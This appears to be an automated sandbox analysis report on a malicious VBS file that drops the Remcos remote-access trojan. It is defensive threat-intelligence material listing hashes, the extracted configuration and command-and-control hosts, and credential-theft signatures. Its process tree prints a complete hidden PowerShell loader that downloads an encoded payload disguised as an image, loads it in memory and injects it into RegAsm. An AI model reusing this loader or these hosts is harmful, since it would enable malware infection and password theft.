Analysis
-
max time kernel
119s -
max time network
115s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64 arch:x86 image:win11-20240802-en locale:en-us os:windows11-21h2-x64 system -
submitted
13-08-2024 14:41
Static task
static1
Behavioral task
behavioral1
Sample
buttersmoothkitchenapparealssilk.vbs
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
buttersmoothkitchenapparealssilk.vbs
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
buttersmoothkitchenapparealssilk.vbs
Resource
win10v2004-20240802-en
Behavioral task
behavioral4
Sample
buttersmoothkitchenapparealssilk.vbs
Resource
win11-20240802-en
General
-
Target
buttersmoothkitchenapparealssilk.vbs
-
Size
113KB
-
MD5
76326ac1e6d011a8ebcba393ae837027
-
SHA1
7522980c1732232015f991e0acde8317662430a2
-
SHA256
898a32ace081284c9ac01b3a33a3b000abab7f4e207a6f8e1a7ae213e1e3cdf5
-
SHA512
829a7a45944a055ca9723e835319b1c919eb895c720c38040154aaf836184aea33a849e71f1b4a7cd9f191265f4cc0809de7ddc53a5cbd3c9b8eaf989e138e99
-
SSDEEP
1536:MkLcccOgt5pzwUGw3VUJW4Wrle/PhG+/kery+bG8:Xgt5pVGw3dS7b
Malware Config
Extracted
http://servidorwindows.ddns.com.br/Files/vbs.jpeg
Extracted
remcos
RemoteHost
serversw.duckdns.org:6875
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
nert
-
keylog_path
%Temp%
-
mouse_option
false
-
mutex
Rmc-6K7C75
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
Processes:
resource yara_rule
behavioral4/memory/1708-55-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft
behavioral4/memory/4392-56-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft
behavioral4/memory/2468-58-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft
-
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule
behavioral4/memory/1708-55-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView
-
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule
behavioral4/memory/4392-56-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exe
flow pid Process
2 3804 powershell.exe
5 3804 powershell.exe
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exe
powershell.exe
pid Process
1040 powershell.exe
3804 powershell.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
RegAsm.exe
description ioc Process
Key opened \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts RegAsm.exe
-
Suspicious use of SetThreadContext 4 IoCs
Processes:
powershell.exe
RegAsm.exe
description pid Process procid_target
PID 3804 set thread context of 4376 3804 powershell.exe 81
PID 4376 set thread context of 4392 4376 RegAsm.exe 83
PID 4376 set thread context of 1708 4376 RegAsm.exe 84
PID 4376 set thread context of 2468 4376 RegAsm.exe 87
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
RegAsm.exe
RegAsm.exe
RegAsm.exe
RegAsm.exe
description ioc Process
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
powershell.exe
powershell.exe
RegAsm.exe
RegAsm.exe
pid Process
1040 powershell.exe
1040 powershell.exe
3804 powershell.exe
3804 powershell.exe
2468 RegAsm.exe
2468 RegAsm.exe
4392 RegAsm.exe
4392 RegAsm.exe
4392 RegAsm.exe
4392 RegAsm.exe
-
Suspicious behavior: MapViewOfSection 6 IoCs
Processes:
RegAsm.exe
pid Process
4376 RegAsm.exe
4376 RegAsm.exe
4376 RegAsm.exe
4376 RegAsm.exe
4376 RegAsm.exe
4376 RegAsm.exe
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exe
powershell.exe
RegAsm.exe
description pid Process
Token: SeDebugPrivilege 1040 powershell.exe
Token: SeDebugPrivilege 3804 powershell.exe
Token: SeDebugPrivilege 2468 RegAsm.exe
-
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
RegAsm.exe
pid Process
4376 RegAsm.exe
-
Suspicious use of WriteProcessMemory 37 IoCs
Processes:
WScript.exe
powershell.exe
powershell.exe
RegAsm.exe
description pid Process procid_target
PID 4192 wrote to memory of 1040 4192 WScript.exe 78
PID 4192 wrote to memory of 1040 4192 WScript.exe 78
PID 1040 wrote to memory of 3804 1040 powershell.exe 80
PID 1040 wrote to memory of 3804 1040 powershell.exe 80
PID 3804 wrote to memory of 4376 3804 powershell.exe 81
PID 3804 wrote to memory of 4376 3804 powershell.exe 81
PID 3804 wrote to memory of 4376 3804 powershell.exe 81
PID 3804 wrote to memory of 4376 3804 powershell.exe 81
PID 3804 wrote to memory of 4376 3804 powershell.exe 81
PID 3804 wrote to memory of 4376 3804 powershell.exe 81
PID 3804 wrote to memory of 4376 3804 powershell.exe 81
PID 3804 wrote to memory of 4376 3804 powershell.exe 81
PID 3804 wrote to memory of 4376 3804 powershell.exe 81
PID 3804 wrote to memory of 4376 3804 powershell.exe 81
PID 3804 wrote to memory of 4376 3804 powershell.exe 81
PID 3804 wrote to memory of 4376 3804 powershell.exe 81
PID 4376 wrote to memory of 4536 4376 RegAsm.exe 82
PID 4376 wrote to memory of 4536 4376 RegAsm.exe 82
PID 4376 wrote to memory of 4536 4376 RegAsm.exe 82
PID 4376 wrote to memory of 4392 4376 RegAsm.exe 83
PID 4376 wrote to memory of 4392 4376 RegAsm.exe 83
PID 4376 wrote to memory of 4392 4376 RegAsm.exe 83
PID 4376 wrote to memory of 4392 4376 RegAsm.exe 83
PID 4376 wrote to memory of 1708 4376 RegAsm.exe 84
PID 4376 wrote to memory of 1708 4376 RegAsm.exe 84
PID 4376 wrote to memory of 1708 4376 RegAsm.exe 84
PID 4376 wrote to memory of 1708 4376 RegAsm.exe 84
PID 4376 wrote to memory of 2012 4376 RegAsm.exe 85
PID 4376 wrote to memory of 2012 4376 RegAsm.exe 85
PID 4376 wrote to memory of 2012 4376 RegAsm.exe 85
PID 4376 wrote to memory of 4072 4376 RegAsm.exe 86
PID 4376 wrote to memory of 4072 4376 RegAsm.exe 86
PID 4376 wrote to memory of 4072 4376 RegAsm.exe 86
PID 4376 wrote to memory of 2468 4376 RegAsm.exe 87
PID 4376 wrote to memory of 2468 4376 RegAsm.exe 87
PID 4376 wrote to memory of 2468 4376 RegAsm.exe 87
PID 4376 wrote to memory of 2468 4376 RegAsm.exe 87
Processes
-
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\buttersmoothkitchenapparealssilk.vbs" 1⤵
- Suspicious use of WriteProcessMemory
PID:4192 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '…';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('⫮ ≵ ₪ ㊎ ㆑','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD 2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1040 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$link = 'http://servidorwindows.ddns.com.br/Files/vbs.jpeg'; $webClient = New-Object System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) } catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; exit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('dnlib.IO.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.HSLF/121/741.901.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm','desativado')) } }" 3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3804 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" 4⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4376 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\fcdddttthqvgy" 5⤵
PID:4536
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\fcdddttthqvgy" 5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4392
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\hwiwemevvyotbugz" 5⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:1708
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\syoofeppjggylbcdcjkl" 5⤵
PID:2012
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\syoofeppjggylbcdcjkl" 5⤵
PID:4072
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\syoofeppjggylbcdcjkl" 5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2468
-
-
-
-
Network
MITRE ATT&CK Enterprise v15